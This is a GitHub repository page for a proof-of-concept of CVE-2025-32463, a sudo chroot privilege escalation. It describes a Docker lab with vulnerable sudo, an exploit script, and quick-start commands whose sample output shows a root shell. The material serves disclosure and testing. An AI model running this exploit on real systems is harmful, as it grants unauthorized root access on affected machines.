Skip to content

carlosaruy/CVE-2025-32463_chwoot

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2025-32463 – sudo chroot ("chwoot") PoC

This repository provides a minimal, reproducible environment to demonstrate the CVE‑2025‑32463 privilege‑escalation flaw in sudo’s chroot feature.


Contents

File Purpose
Dockerfile Builds an Ubuntu 24.04 image with vulnerable sudo 1.9.16p2 and build tools
sudo‑chwoot.sh Proof‑of‑concept exploit that spawns a root shell inside the chroot
run.sh Helper script that builds the image (if needed) and launches the exploit container

Affected Versions

Vulnerable builds of sudo 1.9.14 up to 1.9.17 (all p‑revisions) on most Linux distributions are affected.


Quick Start

# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)

run.sh passes --privileged and --rm to Docker so the container cleans itself up when you exit.


Clean Up

Remove the image when you’re done:

docker rmi sudo-chwoot

Reference

About

sudo Local Privilege Escalation CVE-2025-32463

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Dockerfile 53.4%
  • Shell 46.6%